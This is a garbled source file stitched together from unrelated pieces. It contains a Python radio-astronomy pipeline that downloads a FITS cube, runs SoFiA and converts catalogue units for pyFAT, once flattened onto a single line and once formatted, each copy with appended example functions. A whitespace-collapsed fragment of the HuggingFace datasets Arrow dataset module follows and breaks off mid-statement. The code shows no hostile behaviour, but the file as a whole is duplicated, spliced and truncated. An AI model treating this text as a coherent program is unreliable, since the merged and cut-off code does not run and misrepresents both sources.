processed_cat['i'] = inclination processed_cat.reset_index(drop=True, inplace=True) # This is just to set the right order of the output columns processed_cat = processed_cat[['id', 'ra', 'dec', 'hi_size', 'line_flux_integral', 'central_freq', 'pa', 'i', 'w20']] return processed_cat def prepare_parameters(parameters=param_development_small, type ='debug'): parameters_in = read_sofia_parameters(param_development_small) parameters_in['input.data'] = f'{fitsfile}' parameters_in['output.directory'] = f'{results_path}/{type}' parameters_in['output.filename'] = f'{type}' if not os.path.isdir(results_path): os.mkdir(results_path) write_sofia_parameters(parameters_in, f'{results_path}/sofia_settings.par') def write_sofia_parameters(template,name, debug = False): with open(name,'w') as file: for key in template: if key[0] == 'E' or key [0] == 'H': file.write(template[key]) else: file.write(f"{key} = {template[key]}\n") def read_sofia_parameters(filename,debug = False): with open(filename,'r') as f: template = f.readlines() result = {} counter = 0 counter2 = 0 # Separate the keyword names for line in template: key = str(line.split('=')[0].strip()) if key == '': result[f'EMPTY{counter}'] = line counter += 1 elif key[0] == '#': result[f'HASH{counter2}'] = line counter2 += 1 else: result[key] = str(line.split('=')[1].strip()) return result def organize_sofia(catalog,convert= True, type='debug'): fat_catalog = {'id': ['number'], 'dist': ['Distance'], 'dir': ['Directoryname'], 'cube': ['Cubename']} #sofia_output = ['spec.txt','chan.fits','mom0.fits','mom1.fits','mom2.fits','mask.fits','cube.fits']o sofia_output = ['cube.fits'] for source in catalog['id']: if not os.path.isdir(f'{main_dir}/interim//sofia_{source}'): os.mkdir(f'{main_dir}/interim//sofia_{source}') #Move all sofia out put to a proper directory for file in sofia_output: if convert: convert_frequency_axis(f'{results_path}/{type}/{type}_cubelets/{type}_{source}_{file}',\ f'{main_dir}/interim/sofia_{source}/{type}_{source}_{file}') else: command= f'cp -f {results_path}/{type}/{type}_cubelets/{type}_{source}_{file} {main_dir}/interim/sofia_{source}/{type}_{source}_{file}' os.system(command) fat_catalog['id'].append(source) fat_catalog['dist'].append('-1') fat_catalog['dir'].append(f'sofia_{source}') fat_catalog['cube'].append(f'{type}_{source}_cube') with open(f'{main_dir}/interim/fit_catalogue.txt','w') as f: for i in range(len(fat_catalog['id'])): f.write(f'''{fat_catalog['id'][i]}|{fat_catalog['dist'][i]}|{fat_catalog['dir'][i]}|{fat_catalog['cube'][i]}\n''') def fat_configuration(filename,type='debug'): with open(filename,'r') as f: template = f.readlines() with open(f'{main_dir}/interim/FAT_INPUT.config','w') as f: f.write(f'#This is the configuration file for fit {type} at {datetime.now()} \n') with open(f'{main_dir}/interim/FAT_INPUT.config','a') as f: for line in template: setting = line.split('=')[0].strip() if setting == 'catalogue': line = f'catalogue = {main_dir}/interim/fit_catalogue.txt \n' elif setting == 'maindir': line = f'maindir = {main_dir}/interim/ \n' elif setting == 'outputcatalogue': line = f'outputcatalogue={main_dir}/interim/fat_results.txt \n' elif setting == 'outputlog': line = f'outputlog = log.txt \n' f.write(line) def main(): download_data(data_parameters, type= set_type, force=False) prepare_parameters(parameters=param_development_small, type = set_type) run_sofia(parameters=f'{results_path}/sofia_settings.par', outputdir= set_type) raw_cat = sofia2cat(catalog=os.path.join(results_path, 
set_type,f'{set_type}_cat.txt')) processed_cat = process_catalog(raw_cat, fitsfile) print(processed_cat) print(f'This catalog is being saved in: {final_cat}') processed_cat['central_freq'] = processed_cat['central_freq'].map('{:.1f}'.format) processed_cat.to_csv(final_cat, sep=' ', index=False) if run_fat: if not os.path.isdir(f'{main_dir}/interim'): os.mkdir(f'{main_dir}/interim') convert = False if 'freq' in raw_cat: convert = True organize_sofia(processed_cat,convert= convert, type=set_type) fat_configuration('./parameters/FAT_INPUT.config',type=set_type) command = f'pyFAT -t -c {main_dir}/interim/FAT_INPUT.config' print(command) os.system(command) if __name__ == "__main__": main()
import os
import sys
import shutil
import re
from datetime import datetime
import numpy as np
import pandas as pd
#import matplotlib.pyplot as plt
import yaml
from astropy.io import fits
from astropy.wcs import WCS
from shutil import which

set_type = 'evaluation'
#set_type = 'development_small'
#set_type = 'debug'
run_fat = False
type = {'evaluation': {'dir': 'evaluation', 'file': 'sky_eval'},
        'development_small': {'dir': 'development_small', 'file': 'sky_dev'},
        'debug': {'dir': 'debug', 'file': 'test'},
        }
main_dir = './'
data_parameters = './parameters/data.yml'
param_development_small = './parameters/sofia_dev_small.par'
fitsfile = f'''{main_dir}/{type[set_type]['dir']}/{type[set_type]['file']}.fits'''

with open(data_parameters, "r") as f:
    data_yml = yaml.load(f, Loader=yaml.FullLoader)

fitsfile = f'''{main_dir}/{data_yml['data_path']}/{type[set_type]['dir']}/{type[set_type]['file']}.fits'''
data_path = f'''{main_dir}/{data_yml['data_path']}/{type[set_type]['dir']}'''
if not os.path.isdir(f'''{main_dir}/{data_yml['data_path']}'''):
    os.mkdir(f'''{main_dir}/{data_yml['data_path']}''')
results_path = f'''{main_dir}/results'''
dev_small_cat = f'''{results_path}/{set_type}_small_cat.txt'''
final_cat = f'''{results_path}/final_catalogue_{set_type}.csv'''

###### Constants to use
f0 = 1420405751.786  # Hz
c = 299792.458  # km/s

# Functions
def is_tool(name):
    """Check whether `name` is on PATH and marked as executable."""
    return which(name) is not None


def download_data(data_parameters, type='debug', force=False):
    if force:
        shutil.rmtree(data_path)
    if not os.path.isdir(data_path):
        os.mkdir(data_path)
    else:
        if os.path.isfile(fitsfile):
            print(f'There is no need to download {fitsfile} as it already exists')
            # This could be expanded to check for the readme and continuum
            return
    for filename in data_yml['download_locations'][type]['files']:
        pathname = data_yml['download_locations'][type]['path']
        command = f'wget --no-check-certificate "{pathname}download?path=%2F&files={filename}" -O {data_path}/{filename}'
        print(command)
        os.system(command)


def run_sofia(parameters, outputdir):
    """Run SoFiA; only executed if the output catalogue does not exist."""
    # It makes sense to not run this when the results exist, but a check on an existing catalogue may be better
    if not os.path.isfile(os.path.join(results_path, outputdir, f'{outputdir}_cat.txt')):
        if not os.path.isdir(os.path.join(results_path, outputdir)):
            os.mkdir(os.path.join(results_path, outputdir))
        # The '2' suffix stems from a dual installation of SoFiA versions; a version check should be implemented
        if is_tool('sofia2'):
            os.system(f"sofia2 {parameters}")
        elif is_tool('sofia'):
            os.system(f"sofia {parameters}")
        else:
            print('sofia not available. Please install Sofia-2')
            sys.exit(1)
        command = f'mv {parameters} {os.path.join(results_path, outputdir)}/sofia_input_parameters.par'
        print(command)
        os.system(command)
    else:
        print(f'''We have already found the catalogue {os.path.join(results_path, outputdir, f'{outputdir}_cat.txt')}, continuing to process.''')
    return


def read_sofia_header(filename):
    with open(filename, 'r') as f:
        head_line = f.readlines()[10]
    head = re.split(r'\s+', head_line.strip('\n'))[1:]  # 1: to remove the leading #
    return head


def sofia2cat(catalog):
    head = read_sofia_header(catalog)
    raw_cat = pd.read_csv(catalog, delim_whitespace=True, header=None, names=head, comment='#')
    raw_cat.sort_values(by='f_sum', ascending=False, inplace=True)
    raw_cat_filtered = raw_cat[raw_cat['kin_pa'] > 0]
    print('Sofia raw catalog filtered:')
    if 'freq' in raw_cat_filtered:
        print(raw_cat_filtered[['x', 'y', 'ell_maj', 'ell_min', 'f_sum', 'freq', 'kin_pa', 'w20']])
    elif 'v_app' in raw_cat_filtered:
        print(raw_cat_filtered[['x', 'y', 'ell_maj', 'ell_min', 'f_sum', 'v_app', 'kin_pa', 'w20']])
    return raw_cat_filtered


def pix2coord(wcs, x, y):
    coord = wcs.pixel_to_world(x, y, 1)
    #print('coord')
    #print(coord)
    return coord[0].ra.deg, coord[0].dec.deg


def compute_inclination(bmaj, bmin):
    # returns an angle in degrees
    return np.arctan2(bmin, bmaj)*180./np.pi


def convert_units(raw_cat, fitsfile):
    f = fits.open(fitsfile)
    wcs = WCS(f[0].header)
    f.close()
    # Convert x,y in pixels to R.A.,Dec. in deg
    ra_deg, dec_deg = pix2coord(wcs, raw_cat['x'], raw_cat['y'])
    # Get pixel size
    pix2arcsec = wcs.wcs.get_cdelt()[1]*3600.  # This assumes the same pixel size in both directions
    pix2freq = f[0].header['CDELT3']
    return ra_deg, dec_deg, pix2arcsec, pix2freq


def frequency_to_vel(freq, invert=False):
    if not invert:
        return c*((f0**2-freq**2)/(f0**2+freq**2))
    else:
        return f0*np.sqrt((1-freq/c)/(1+freq/c))


def convert_flux(flux, filename):
    # This assumes that flux comes from SoFiA in Jy/beam and converts it based on the header
    hdr = fits.getheader(filename)
    print(hdr['BMAJ'], hdr['BMIN'])
    beamarea = (np.pi*abs(hdr['BMAJ']*hdr['BMIN']))/(4.*np.log(2.))
    pix_per_beam = beamarea/(abs(hdr['CDELT1'])*abs(hdr['CDELT2']))
    #cdelt_vel = abs(-c*float(hdr['CDELT3'])/f0)
    cdelt_hz = float(hdr['CDELT3'])
    return flux/pix_per_beam*cdelt_hz  # Jy * Hz


# Convert the frequency axis of a cube
def convert_frequency_axis(filename, outname, velocity_req='radio'):
    c_ms = c*1000.
    print(filename)
    cube = fits.open(filename)
    hdr = cube[0].header
    # Check we have a proper third axis
    if hdr['CTYPE3'].lower() != 'freq' or hdr['NAXIS'] < 3:
        print('We cannot convert this axis as it is not a frequency axis')
        return
    # get central values
    crpix = float(hdr['CRPIX3'])
    crval = float(hdr['CRVAL3'])
    naxis_len = float(hdr['NAXIS3'])
    # make sure the reference pixel is rather central, else large errors are introduced in both vrad and rel
    if not (naxis_len/2.-5 < crpix < naxis_len/2.+5):
        hdr_wcs = WCS(hdr)
        centralx, centraly, new_freq = hdr_wcs.wcs_pix2world(hdr['CRPIX1'], hdr['CRPIX2'], naxis_len/2., 1)
        hdr['CRPIX3'] = naxis_len/2.
        crval = new_freq
    # Now convert
    if velocity_req == 'radio':
        # convert from frequency to radio velocity
        cdelt_vel = -c_ms*float(hdr['CDELT3'])/f0
        crval_vel = c_ms*(1-crval/f0)
        # https://fits.gsfc.nasa.gov/standard40/fits_standard40aa-le.pdf
        hdr['CTYPE3'] = 'VRAD'
    elif velocity_req == 'relativistic':
        # This should only ever be used for cubes with a small velocity range
        crval_vel = frequency_to_vel(crval)
        freq_step = float(hdr['CDELT3'])
        central_two = frequency_to_vel(crval+freq_step)
        lower_one = frequency_to_vel(crval-(naxis_len/2.)*freq_step)
        lower_two = frequency_to_vel(crval-(naxis_len/2.+1)*freq_step)
        upper_one = frequency_to_vel(crval+(naxis_len/2.-1.)*freq_step)
        upper_two = frequency_to_vel(crval+(naxis_len/2.)*freq_step)
        cdelt_vel = np.mean([central_two-crval_vel, lower_two-lower_one, upper_two-upper_one])*1000.
        if cdelt_vel*naxis_len > 1e6:
            print('This cube is too big for a relativistic conversion')
            return
        hdr['CTYPE3'] = 'VELO'
    else:
        print("We don't do those things here.")
        return
    hdr['CDELT3'] = cdelt_vel
    hdr['CRVAL3'] = crval_vel
    if 'CUNIT3' in hdr:
        # delete CUNIT3 because we adopt the default units = m/s
        del hdr['CUNIT3']
    fits.writeto(outname, cube[0].data, hdr, overwrite=True)


def process_catalog(raw_cat, fitsfile):
    # Unit conversion
    ra_deg, dec_deg, pix2arcsec, pix2vel = convert_units(raw_cat, fitsfile)
    hi_size = raw_cat['ell_maj']*pix2arcsec
    # Estimate inclination based on the fitted ellipsoid, assuming the galaxy is intrinsically circular
    inclination = compute_inclination(raw_cat['ell_maj'], raw_cat['ell_min'])

    # Construct the output catalog
    processed_cat = pd.DataFrame()
    processed_cat['id'] = raw_cat['id']
    processed_cat['ra'] = ra_deg
    processed_cat['dec'] = dec_deg
    processed_cat['hi_size'] = hi_size
    processed_cat['line_flux_integral'] = convert_flux(raw_cat['f_sum'], fitsfile)  # Now converted to Jy*km/s; verification for development needed
    if 'freq' in raw_cat:
        processed_cat['central_freq'] = raw_cat['freq']
        #processed_cat['central_velocity'] = frequency_to_vel(raw_cat['freq'])
        processed_cat['w20'] = frequency_to_vel(raw_cat['freq']-raw_cat['w20']/2.*pix2vel)-frequency_to_vel(raw_cat['freq']+raw_cat['w20']/2.*pix2vel)  # we need to clarify if the units and the definition are the same
    else:
        #processed_cat['central_velocity'] = raw_cat['v_app']
        processed_cat['central_freq'] = frequency_to_vel(raw_cat['v_app'], invert=True)
        processed_cat['w20'] = raw_cat['w20']*pix2vel  # we need to clarify if what sofia gives is the central freq
    processed_cat['pa'] = raw_cat['kin_pa']  # we need to clarify if the SoFiA kinematic angle agrees with their P.A.
    processed_cat['i'] = inclination
    processed_cat.reset_index(drop=True, inplace=True)
    # This is just to set the right order of the output columns
    processed_cat = processed_cat[['id', 'ra', 'dec', 'hi_size', 'line_flux_integral', 'central_freq', 'pa', 'i', 'w20']]
    return processed_cat


def prepare_parameters(parameters=param_development_small, type='debug'):
    parameters_in = read_sofia_parameters(parameters)
    parameters_in['input.data'] = f'{fitsfile}'
    parameters_in['output.directory'] = f'{results_path}/{type}'
    parameters_in['output.filename'] = f'{type}'
    if not os.path.isdir(results_path):
        os.mkdir(results_path)
    write_sofia_parameters(parameters_in, f'{results_path}/sofia_settings.par')


def write_sofia_parameters(template, name, debug=False):
    with open(name, 'w') as file:
        for key in template:
            if key[0] == 'E' or key[0] == 'H':
                file.write(template[key])
            else:
                file.write(f"{key} = {template[key]}\n")


def read_sofia_parameters(filename, debug=False):
    with open(filename, 'r') as f:
        template = f.readlines()
    result = {}
    counter = 0
    counter2 = 0
    # Separate the keyword names
    for line in template:
        key = str(line.split('=')[0].strip())
        if key == '':
            result[f'EMPTY{counter}'] = line
            counter += 1
        elif key[0] == '#':
            result[f'HASH{counter2}'] = line
            counter2 += 1
        else:
            result[key] = str(line.split('=')[1].strip())
    return result


def organize_sofia(catalog, convert=True, type='debug'):
    fat_catalog = {'id': ['number'],
                   'dist': ['Distance'],
                   'dir': ['Directoryname'],
                   'cube': ['Cubename']}
    #sofia_output = ['spec.txt','chan.fits','mom0.fits','mom1.fits','mom2.fits','mask.fits','cube.fits']
    sofia_output = ['cube.fits']
    for source in catalog['id']:
        if not os.path.isdir(f'{main_dir}/interim/sofia_{source}'):
            os.mkdir(f'{main_dir}/interim/sofia_{source}')
        # Move all SoFiA output to a proper directory
        for file in sofia_output:
            if convert:
                convert_frequency_axis(f'{results_path}/{type}/{type}_cubelets/{type}_{source}_{file}',
                                       f'{main_dir}/interim/sofia_{source}/{type}_{source}_{file}')
            else:
                command = f'cp -f {results_path}/{type}/{type}_cubelets/{type}_{source}_{file} {main_dir}/interim/sofia_{source}/{type}_{source}_{file}'
                os.system(command)
        fat_catalog['id'].append(source)
        fat_catalog['dist'].append('-1')
        fat_catalog['dir'].append(f'sofia_{source}')
        fat_catalog['cube'].append(f'{type}_{source}_cube')
    with open(f'{main_dir}/interim/fit_catalogue.txt', 'w') as f:
        for i in range(len(fat_catalog['id'])):
            f.write(f'''{fat_catalog['id'][i]}|{fat_catalog['dist'][i]}|{fat_catalog['dir'][i]}|{fat_catalog['cube'][i]}\n''')


def fat_configuration(filename, type='debug'):
    with open(filename, 'r') as f:
        template = f.readlines()
    with open(f'{main_dir}/interim/FAT_INPUT.config', 'w') as f:
        f.write(f'#This is the configuration file for fit {type} at {datetime.now()} \n')
    with open(f'{main_dir}/interim/FAT_INPUT.config', 'a') as f:
        for line in template:
            setting = line.split('=')[0].strip()
            if setting == 'catalogue':
                line = f'catalogue = {main_dir}/interim/fit_catalogue.txt \n'
            elif setting == 'maindir':
                line = f'maindir = {main_dir}/interim/ \n'
            elif setting == 'outputcatalogue':
                line = f'outputcatalogue={main_dir}/interim/fat_results.txt \n'
            elif setting == 'outputlog':
                line = f'outputlog = log.txt \n'
            f.write(line)


def main():
    download_data(data_parameters, type=set_type, force=False)
    prepare_parameters(parameters=param_development_small, type=set_type)
    run_sofia(parameters=f'{results_path}/sofia_settings.par', outputdir=set_type)
    raw_cat = sofia2cat(catalog=os.path.join(results_path,
                                             set_type, f'{set_type}_cat.txt'))
    processed_cat = process_catalog(raw_cat, fitsfile)
    print(processed_cat)
    print(f'This catalog is being saved in: {final_cat}')
    processed_cat['central_freq'] = processed_cat['central_freq'].map('{:.1f}'.format)
    processed_cat.to_csv(final_cat, sep=' ', index=False)
    if run_fat:
        if not os.path.isdir(f'{main_dir}/interim'):
            os.mkdir(f'{main_dir}/interim')
        convert = False
        if 'freq' in raw_cat:
            convert = True
        organize_sofia(processed_cat, convert=convert, type=set_type)
        fat_configuration('./parameters/FAT_INPUT.config', type=set_type)
        command = f'pyFAT -t -c {main_dir}/interim/FAT_INPUT.config'
        print(command)
        os.system(command)


if __name__ == "__main__":
    main()
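
# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the pipeline above, and never called by it):
# a minimal, self-contained check of the two spectral conversions used by
# frequency_to_vel() and convert_frequency_axis(). The constants are restated
# locally so the snippet can run on its own; the input frequency and the helper
# name are assumptions chosen purely for illustration.
def _example_spectral_conversions():
    import numpy as np
    f0_hz = 1420405751.786   # HI rest frequency [Hz]
    c_kms = 299792.458       # speed of light [km/s]

    freq = 1.35e9            # an assumed observed frequency [Hz]

    # Radio convention, as in the 'radio' branch above: v_rad = c * (1 - f / f0)
    v_radio = c_kms * (1.0 - freq / f0_hz)

    # Relativistic convention, as in frequency_to_vel(): v = c * (f0^2 - f^2) / (f0^2 + f^2)
    v_rel = c_kms * (f0_hz**2 - freq**2) / (f0_hz**2 + freq**2)

    # Inverting the relativistic relation recovers the frequency (frequency_to_vel(..., invert=True))
    freq_back = f0_hz * np.sqrt((1.0 - v_rel / c_kms) / (1.0 + v_rel / c_kms))

    print(f"radio velocity:        {v_radio:12.1f} km/s")
    print(f"relativistic velocity: {v_rel:12.1f} km/s")
    print(f"frequency recovered:   {freq_back:16.3f} Hz (input {freq:.3f} Hz)")

# _example_spectral_conversions()  # uncomment to run the check manually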
# coding=utf-8 # Copyright 2020 The HuggingFace Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """ Simple Dataset wrapping an Arrow Table.""" import contextlib import copy import json import os import shutil import tempfile import weakref from collections import Counter, UserDict from collections.abc import Mapping from copy import deepcopy from dataclasses import asdict from functools import partial, wraps from io import BytesIO from math import ceil, floor from pathlib import Path from typing import ( TYPE_CHECKING, Any, BinaryIO, Callable, Dict, Iterable, Iterator, List, Optional, Tuple, Union, overload, ) import fsspec import numpy as np import pandas as pd import pyarrow as pa import pyarrow.compute as pc from huggingface_hub import HfApi, HfFolder from multiprocess import Pool, RLock from requests import HTTPError from tqdm.auto import tqdm from . import config, utils from .arrow_reader import ArrowReader from .arrow_writer import ArrowWriter, OptimizedTypedSequence from .features import ClassLabel, Features, FeatureType, Sequence, Value, _ArrayXD, pandas_types_mapper from .filesystems import extract_path_from_uri, is_remote_filesystem from .fingerprint import ( fingerprint_transform, generate_fingerprint, generate_random_fingerprint, get_temporary_cache_files_directory, is_caching_enabled, maybe_register_dataset_for_temp_dir_deletion, update_fingerprint, ) from .formatting import format_table, get_format_type_from_alias, get_formatter, query_table from .info import DatasetInfo from .search import IndexableMixin from .splits import NamedSplit, Split, SplitInfo from .table import ( InMemoryTable, MemoryMappedTable, Table, cast_with_sliced_list_support, concat_tables, list_table_cache_files, ) from .tasks import TaskTemplate from .utils import logging from .utils.deprecation_utils import deprecated from .utils.file_utils import estimate_dataset_size from .utils.info_utils import is_small_dataset from .utils.py_utils import unique_values from .utils.typing import PathLike if TYPE_CHECKING: from .dataset_dict import DatasetDict logger = logging.get_logger(__name__) class LazyDict(UserDict): def __init__(self, data, features=None, decoding=True): self.data = data self.features = ( {key: feature for key, feature in features.items() if hasattr(feature, "decode_example")} if features else {} ) self.decoding = decoding def values(self): return self.data.values() def items(self): return self.data.items() class Example(LazyDict): def __getitem__(self, key): value = super().__getitem__(key) if self.decoding and self.features and key in self.features: value = self.features[key].decode_example(value) if value is not None else None self[key] = value del self.features[key] return value class Batch(LazyDict): def __getitem__(self, key): values = super().__getitem__(key) if self.decoding and self.features and key in self.features: values = [self.features[key].decode_example(value) if value is not None else None for value in values] self[key] = values del self.features[key] return values 
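
# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the datasets library, and never called by it):
# how the LazyDict subclasses above defer feature decoding until a key is first
# accessed. _FakeImageFeature is a hypothetical stand-in for any feature that
# exposes `decode_example`; it exists only to keep the example self-contained.
def _example_lazy_decoding():
    class _FakeImageFeature:
        def decode_example(self, value):
            # A real feature would e.g. open the file and return an image object;
            # here we just wrap the value so the decoding step is visible.
            return {"decoded_from": value}

    example = Example(
        {"image": "path/to/img.png", "label": 1},
        features={"image": _FakeImageFeature()},
    )
    # "label" has no decodable feature, so it is returned exactly as stored.
    assert example["label"] == 1
    # "image" is decoded lazily on first access, then written back into the dict.
    assert example["image"] == {"decoded_from": "path/to/img.png"}
    # The second access hits the cached, already-decoded value.
    assert example["image"] == {"decoded_from": "path/to/img.png"}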
class DatasetInfoMixin: """This base class exposes some attributes of DatasetInfo at the base level of the Dataset for easy access. """ def __init__(self, info: DatasetInfo, split: Optional[NamedSplit]): self._info = info self._split = split @property def info(self): """:class:`datasets.DatasetInfo` object containing all the metadata in the dataset.""" return self._info @property def split(self): """:class:`datasets.NamedSplit` object corresponding to a named dataset split.""" return self._split @property def builder_name(self) -> str: return self._info.builder_name @property def citation(self) -> str: return self._info.citation @property def config_name(self) -> str: return self._info.config_name @property def dataset_size(self) -> Optional[int]: return self._info.dataset_size @property def description(self) -> str: return self._info.description @property def download_checksums(self) -> Optional[dict]: return self._info.download_checksums @property def download_size(self) -> Optional[int]: return self._info.download_size @property def features(self) -> Features: return self._info.features @property def homepage(self) -> Optional[str]: return self._info.homepage @property def license(self) -> Optional[str]: return self._info.license @property def size_in_bytes(self) -> Optional[int]: return self._info.size_in_bytes @property def supervised_keys(self): return self._info.supervised_keys @property def task_templates(self): return self._info.task_templates @property def version(self): return self._info.version class TensorflowDatasetMixin: _TF_DATASET_REFS = set() @staticmethod def _get_output_signature(dataset: "Dataset", collate_fn: Callable, collate_fn_args: dict, batch_size: int): """Private method used by `to_tf_dataset()` to find the shapes and dtypes of samples from this dataset after being passed through the collate_fn. Args: dataset (:obj:`Dataset`): Dataset to load samples from. collate_fn(:obj:`bool`): Shuffle the dataset order when loading. Recommended True for training, False for validation/evaluation. collate_fn(:obj:`Callable`): A function or callable object (such as a `DataCollator`) that will collate lists of samples into a batch. collate_fn_args (:obj:`Dict`): A `dict` of keyword arguments to be passed to the `collate_fn`. batch_size (:obj:`int`): The size of batches loaded from the dataset. Used for shape inference. Returns: :obj:`dict`: Dict mapping column names to tf dtypes :obj:`dict`: Dict mapping column names to tf.TensorSpec objects """ if config.TF_AVAILABLE: import tensorflow as tf else: raise ImportError("Called a Tensorflow-specific function but Tensorflow is not installed.") # Tensorflow needs an exact signature for tf.numpy_function, so # we need to figure out what's coming back in advance. The only way to do this is to run a test batch - # the collator may add columns, so we can't figure it out just by inspecting the dataset. 
if len(dataset) == 0: raise ValueError("Unable to get the output signature because the dataset is empty.") test_batch_size = min(len(dataset), 4) test_batch = dataset[:test_batch_size] test_batch = [{key: value[i] for key, value in test_batch.items()} for i in range(test_batch_size)] test_batch = collate_fn(test_batch, **collate_fn_args) columns_to_dtypes = {} for key, array in test_batch.items(): # In case the collate_fn returns something strange array = np.array(test_batch[key]) if np.issubdtype(array.dtype, np.integer) or array.dtype == np.bool: cast_dtype = np.int64 elif np.issubdtype(array.dtype, np.number): cast_dtype = np.float32 else: continue # Probably a string, but whatever it is will cause Tensorflow to shit the bed, so drop it columns_to_dtypes[key] = cast_dtype signatures = {} for column, col_feature in dataset.features.items(): if column not in columns_to_dtypes: continue shape = [] shape_feature = col_feature while not isinstance(shape_feature, (Value, ClassLabel)): if isinstance(shape_feature, _ArrayXD): shape.extend(list(shape_feature.shape)) break elif isinstance(shape_feature, Sequence): shape.insert(0, shape_feature.length) shape_feature = shape_feature.feature else: raise ValueError( f"Couldn't parse feature {column} with type {type(col_feature)}! " "This may indicate a column was included with an unusual datatype " "that we were unable to process correctly. " "If you're getting this error with one of our datasets, and you're " "sure the column should be convertable to tf.Tensor, please " "file an issue at github.com/huggingface/datasets and tag " "@rocketknight1." ) shape = [batch_size] + shape shape = [dim if dim != -1 else None for dim in shape] signatures[column] = tf.TensorSpec(shape=shape, dtype=tf.dtypes.as_dtype(columns_to_dtypes[column])) # Catching columns added by the collate_fn, such as MLM labels for column, tensor in test_batch.items(): if column in signatures: continue if column.startswith("label"): if "input_ids" in signatures and test_batch[column].shape == test_batch["input_ids"].shape: shape = signatures["input_ids"].shape else: # If this doesn't look like LM labels that got added by the collate_fn, let's not say anything # about the dimensions we're unsure of shape = [batch_size] + [None for dim in tensor.shape.as_list()[1:]] else: # If this doesn't look like LM labels that got added by the collate_fn, let's not say anything # about the dimensions we're unsure of shape = [batch_size] + [None for dim in tensor.shape.as_list()[1:]] signatures[column] = tf.TensorSpec(shape=shape, dtype=tensor.dtype) return columns_to_dtypes, signatures def to_tf_dataset( self, columns: Union[str, List[str]], batch_size: int, shuffle: bool, collate_fn: Callable, drop_remainder: bool = None, collate_fn_args: Dict[str, Any] = None, label_cols: Union[str, List[str]] = None, dummy_labels: bool = False, prefetch: bool = True, ): """Create a tf.data.Dataset from the underlying Dataset. This tf.data.Dataset will load and collate batches from the Dataset, and is suitable for passing to methods like model.fit() or model.predict(). Args: columns (:obj:`List[str]` or :obj:`str`): Dataset column(s) to load in the tf.data.Dataset. In general, only columns that the model can use as input should be included here (numeric data only). batch_size (:obj:`int`): Size of batches to load from the dataset. shuffle(:obj:`bool`): Shuffle the dataset order when loading. Recommended True for training, False for validation/evaluation. 
drop_remainder(:obj:`bool`, default ``None``): Drop the last incomplete batch when loading. If not provided, defaults to the same setting as shuffle. collate_fn(:obj:`Callable`): A function or callable object (such as a `DataCollator`) that will collate lists of samples into a batch. collate_fn_args (:obj:`Dict`, optional): An optional `dict` of keyword arguments to be passed to the `collate_fn`. label_cols (:obj:`List[str]` or :obj:`str`, default ``None``): Dataset column(s) to load as labels. Note that many models compute loss internally rather than letting Keras do it, in which case it is not necessary to actually pass the labels here, as long as they're in the input `columns`. dummy_labels (:obj:`bool`, default ``False``): If no `label_cols` are set, output an array of "dummy" labels with each batch. This can avoid problems with `fit()` or `train_on_batch()` that expect labels to be a Tensor or np.ndarray, but should (hopefully) not be necessary with our standard train_step(). prefetch (:obj:`bool`, default ``True``): Whether to run the dataloader in a separate thread and maintain a small buffer of batches for training. Improves performance by allowing data to be loaded in the background while the model is training. Returns: :class:`tf.data.Dataset` """ if config.TF_AVAILABLE: import tensorflow as tf else: raise ImportError("Called a Tensorflow-specific function but Tensorflow is not installed.") if collate_fn_args is None: collate_fn_args = {} if label_cols is None: label_cols = [] elif isinstance(label_cols, str): label_cols = [label_cols] elif len(set(label_cols)) < len(label_cols): raise ValueError("List of label_cols contains duplicates.") if not columns: raise ValueError("Need to specify at least one column.") elif isinstance(columns, str): columns = [columns] elif len(set(columns)) < len(columns): raise ValueError("List of columns contains duplicates.") if label_cols is not None: cols_to_retain = columns + label_cols else: cols_to_retain = columns if "label" in cols_to_retain or "labels" in cols_to_retain or "label_ids" in cols_to_retain: cols_to_retain += ["labels", "label", "label_ids"] # Don't accidentally drop any labels with other names! 
cols_to_retain = list(set(cols_to_retain)) # Remove any duplicates if drop_remainder is None: # We assume that if you're shuffling it's the train set, so we drop the remainder unless told not to drop_remainder = shuffle retained_columns = [key for key in self.features.keys() if key in cols_to_retain] dataset = self.with_format("numpy", columns=retained_columns) columns_to_dtypes, output_signature = self._get_output_signature( dataset, collate_fn, collate_fn_args, batch_size=batch_size if drop_remainder else None ) all_columns = list(columns_to_dtypes.keys()) all_dtypes = list(columns_to_dtypes.values()) def np_get_batch(indices): batch = dataset[indices] actual_size = len(list(batch.values())[0]) # Get the length of one of the arrays, assume all same # Our collators expect a list of dicts, not a dict of lists/arrays, so we invert batch = [{key: value[i] for key, value in batch.items()} for i in range(actual_size)] batch = collate_fn(batch, **collate_fn_args) out_batch = [] for col, cast_dtype in columns_to_dtypes.items(): # In case the collate_fn returns something strange array = np.array(batch[col]) array = array.astype(cast_dtype) out_batch.append(array) return out_batch @tf.function(input_signature=[tf.TensorSpec(None, tf.int64)]) def fetch_function(indices): output = tf.numpy_function( # This works because dictionaries always output in insertion order np_get_batch, inp=[indices], Tout=[tf.dtypes.as_dtype(dtype) for dtype in all_dtypes], ) return {key: output[i] for i, key in enumerate(all_columns)} tf_dataset = tf.data.Dataset.from_tensor_slices(np.arange(len(dataset), dtype=np.int64)) if shuffle: tf_dataset = tf_dataset.shuffle(len(dataset)) def ensure_shapes(input_dict): return {key: tf.ensure_shape(val, output_signature[key].shape) for key, val in input_dict.items()} tf_dataset = tf_dataset.batch(batch_size, drop_remainder=drop_remainder).map(fetch_function).map(ensure_shapes) if label_cols: def split_features_and_labels(input_batch): if "labels" in columns or "label_ids" in columns or "label" in columns: columns.append("labels") if "labels" in label_cols or "label_ids" in label_cols or "label" in label_cols: label_cols.append("labels") # Some data collators add columns, so our logic is that newly added columns should go # into the input dict unless the user asked for them in labels instead features = { key: tensor for key, tensor in input_batch.items() if key in columns or key not in label_cols } labels = {key: tensor for key, tensor in input_batch.items() if key in label_cols} if len(features) == 1: features = list(features.values())[0] if len(labels) == 1: labels = list(labels.values())[0] return features, labels tf_dataset = tf_dataset.map(split_features_and_labels) elif len(columns) == 1: tf_dataset = tf_dataset.map(lambda x: list(x.values())[0]) if dummy_labels and not label_cols: def add_dummy_labels(input_batch): return input_batch, tf.zeros(tf.shape(input_batch[columns[0]])[0]) tf_dataset = tf_dataset.map(add_dummy_labels) if prefetch: tf_dataset = 